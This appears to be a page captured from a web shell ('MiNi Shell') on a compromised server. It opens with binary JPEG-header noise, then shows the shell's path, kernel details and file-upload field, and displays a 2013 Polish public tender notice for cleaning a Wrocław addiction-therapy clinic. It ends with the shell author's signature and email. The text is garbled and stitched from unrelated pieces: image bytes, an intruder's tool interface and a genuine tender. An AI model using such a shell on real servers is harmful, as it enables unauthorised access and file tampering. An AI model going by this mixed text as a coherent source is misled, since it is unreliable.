JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130620/118991-N-2013.html

<p class="kh_header"><b>Wrocław: Wykonanie usługi -codziennego kompleksowego sprzątania, dezynfekcji w  Ośrodku Profilaktyczno - Leczniczym Chorób Zakaźnych i Terapii Uzależnień przy ul. Wszystkich Świętych 2 we Wrocławiu mające na celu utrzymanie czystości w granicach norm przewidzianych dla obiektów służby zdrowia znak sprawy WCZ/ZP/U-5/2013</b><br>
<b>Numer ogłoszenia: 118991 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławskie Centrum Zdrowia Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Podróżnicza 26/28, 53-208 Wrocław, woj. dolnośląskie, tel. 071 3631529, 3631223, faks 071 3631529, 3631223.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi -codziennego kompleksowego sprzątania, dezynfekcji w  Ośrodku Profilaktyczno - Leczniczym Chorób Zakaźnych i Terapii Uzależnień przy ul. Wszystkich Świętych 2 we Wrocławiu mające na celu utrzymanie czystości w granicach norm przewidzianych dla obiektów służby zdrowia znak sprawy WCZ/ZP/U-5/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac porządkowych w Ośrodku Profilaktyczno - Leczniczym Chorób Zakaźnych i Terapii Uzależnień przy ul. Wszystkich Świętych 2 we Wrocławiu

Poradnia Terapii Uzależnień od Substancji Psychoaktywnych METADON HIV AIDS 

1.  Codziennie  w godzinach : 8.oo - 20.oo oraz Soboty, Niedziele i Święta - w godz.10,oo -13,oo
             -  mycie drzwi i przeszkleń  ścianek przeszklonych - 35,50 m2
             -  mycie posadzek pcv, płytki ceramiczne, powierzchnia zg. z wykazem pomieszczeń 
                oraz czyszczenie - mycie wycieraczek  o pow. - 2,70 m2,
             -  mycie i dezynfekcja umywalek, zlewów, baterii, muszli klozetowych, pisuarów i brodzika,
             -  mycie i dezynfekcja kafli na ścianach, mycie luster,
-  gab. zabiegowy - mycie i dezynfekcja blatów, kafli, umywalek, baterii, fotela do pobierania krwi,
   kozetek, szafek stojących i wiszących, lodówki - pow. zewnętrzną,  
   pok. socjalny - mycie mebli, stół, krzesła, szafki, lodówka, dezynfekcja blatu, kafli, zlewu i baterii,
             -  gabinety lekarskie, terapeutyczne, sala wykładowa, rejestracja, pom. pomocnicze, szatnie, korytarze -     
                przecieranie wyposażenia tj. krzesła, fotele, biurka, stoły, szafy, szafki stojące i wiszące, wieszaki,
-  ścieranie na mokro parapetów  - 12,72 m2
-  opróżnianie, mycie i dezynfekcja kubełków na śmieci szt.27, wymiana worków - worki     
   dostarcza firma sprzątająca ,
-  obsługa zmywarki do butelek szklanych na pojedyncze dawki Metadonu - ilość wsadów
                dziennie - 2 wsady  -  środki do mycia dostarcza zleceniodawca
             -  mycie i wstępna dezynfekcja szklanych butelek na pojedyncze dawki metadonu w ilości  60 - 100 szt
                dziennie  ilość uzależniona od ilości przyjętych pacjentów -  środki myjące i dezynfekcyjne
                dostarcza zleceniodawca,

2.	1x w tygodniu :
               -  mycie lodówki wewnątrz,
               -  wysuwanie i przecieranie szafek podblatowych
               -  przecieranie grzejników,
               -  mycie gablot i usuwanie kurzu z gaśnic
               -  mycie posadzek w pomieszczeniach magazynowych              
             
                3 .   1x na kwartał :
                       -  mycie okien plastikowe  - szt. 26  o wym.141x 119
                                                                        szt.  1   o wym. 220x 100
                                                                        szt.  3   o wym. 81x 108 piwnica
                                                                        szt.  1   o wym. 81x 50   piwnica
                      -  mycie świetlików nad drzwiami  -  4,32 m2

                                                                 
           
        II.   Poradnia Terapii Uzależnień i Współuzależnień
	
            1. Codziennie  w godzinach:  8.oo - 12.oo
             -  mycie drzwi i przeszkleń  ścianek przeszklonych - 28,75 m2
             -  mycie posadzek  pcv, płytki ceramiczne, powierzchnia wg wykazu pomieszczeń, 
             -  odkurzanie wykładziny dywanowej  w sali terapii - 33,71m2 i dywanu 2m x3m w pok. kierownika
             -  mycie i dezynfekcja umywalek, zlewu, baterii, muszli klozetowych, pisuarów i brodzika,
             -  mycie i dezynfekcja kafli na ścianach, mycie luster,
             -  gabinety psychologa, sale terapeutyczne, rejestracja, szatnia, korytarze - przecieranie wyposażenia tj.
                krzesła, fotele, biurka, stoły, szafy, szafki stojące i wiszące, wieszaki,
             -  pokój socjalny - mycie mebli stół, krzesła, szafki, lodówka, dezynfekcja blatu, kafli, zlewu i baterii,
             -  ścieranie na mokro parapetów - 6,93 m2
             -  opróżnianie, mycie i dezynfekcja kubełków na śmieci szt.16 ,wymiana woków - worki dostarcza
                firma sprzątająca,
             - zamiatanie i mycie schodów zewnętrznych wejściowych,

          2. 1x w tygodniu :
             -  wysuwanie i przecieranie szafek podblatowych,
             -  przecieranie grzejników, 
             -  mycie gablot i usuwanie kurzu z gaśnic            

          3. 1x na kwartał :
            -  mycie okien plastikowe - szt.13  o wym. 141x119, 
            -  mycie świetlików nad drzwiami  - 3,24 m2



     III.         Programy zdrowotne - pomieszczenia biurowe
                
          1.   Codziennie  w godzinach 8.oo - 12.oo
              -  mycie posadzek  pcv, płytki ceramiczne  - pow. wg wykazu  pomieszczeń,
              -  mycie drzwi i przeszkleń ścianek przeszklonych -  6,75 m2
              -  mycie i dezynfekcja umywalek, zlewu, baterii, muszli klozetowych, pisuaru  i brodzika,
              -  mycie i dezynfekcja kafli na ścianach, mycie luster,
              -  pok. socjalny - mycie mebli  stół, krzesła, szafki ,lodówka, dezynfekcja blatu, kafli, zlewu i baterii,
              -  pom. biurowe - przecieranie wyposażenia tj. krzesła, biurka, szafy, szafki, wieszaki,
              -  ścieranie na mokro parapetów  - 6,26 m2
              -  opróżnianie, mycie i dezynfekcja kubełków na śmieci szt.12,wymiana worków - worki dostarcza
                  firma sprzątająca
             
          2.   1x  na kwartał
              -  mycie okien plastikowe -  szt.9  o wym.  141x119
              -  mycie świetlika nad drzwiami  0,90x0,45
              -  mycie gablot i przecieranie gaśnicy z kurzu
                    
   

III.	Archiwum
                        1x w tygodniu w godzinach :  10.oo - 12.oo

1.	mycie posadzek z płytek ceramicznych,
2.	opróżnianie, mycie i dezynfekcja kubła na śmieci i wymiana worka,
3.	wycieranie mebli biurka, szafy ,
4.	mycie drzwi,
     5.   zamiatanie schodów wejściowych zewnętrznych                                                                                                                                                                           1x na kwartał
                            -  mycie okien  szt. 2  o wym. 81x 108     



Ośrodek  Profilaktyczno  - Leczniczy Chorób Zakaźnych i Terapii Uzależnień  ul. Wszystkich Świętych 2 we Wrocławiu 	
Poradnia Terapii Uzależnień od Substancji Psychoaktywnych  METADON HIV AIDS 	388,30 m2
Poradnia Terapii Uzależnień i Współuzależnień	331,58 m2
Programy zdrowotne - pomieszczenia biurowe	224,00 m2
Archiwum	286,39
RAZEM wartość w obiektach	xxx	1230,27 m2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> niedotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ). 
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga potwierdzenia spełnienia tego warunku.
Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej jedno zamówienie /sprzątanie placówek służby zdrowia/ polegające na wykonaniu usługi podobnego rodzaju, o wartości minimum 80% wartości składanej oferty.
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ). 
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ). 
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ). 
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>e)  oświadczenie o ubezpieczeniu,  (wzór oświadczenia stanowi załącznik nr 6 do niniejszego SIWZ).
f) wykaz środków , które będzie stosował wykonawca i ilości odpowiednio do powierzchni dla każdej placówki  z kartami charakterystyki (wzór stanowi załącznik nr 8 do niniejszego SIWZ).
g) oświadczenie, że używane przez wykonawcę środki myjąco-dezynfekujące zgodne są z wymogami organów kontrolnych (stacji sanitarno-epidemiologicznej, państwowej inspekcji pracy, służby bhp) (wzór stanowi załącznik nr 9 do niniejszego SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmian w wykazach adresowych (dodanie lub odjęcie adresu dostawy).z zastrzeżeniem, że maksymalna wartość przedmiotu umowy pozostanie bez zmian.
2)	zmiana terminu wykonania umowy pod warunkiem, że wykonanie umowy w terminie nie było możliwe z powodu siły wyższej, strajków itp
3) Wszelkie zmiany do niniejszej umowy wymagają formy pisemnej pod rygorem nieważności w postaci aneksu, z wyłączeniem zapisów §9 umowy, gdzie wystarczającą formą jest pisemne powiadomienie drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławskie Centrum Zdrowia SP ZOZ
ul. Podróżnicza 26/28
53-208 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 10:00, miejsce: Wrocławskie Centrum Zdrowia SP ZOZ
ul. Podróżnicza 26/28
53-208 Wrocław
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com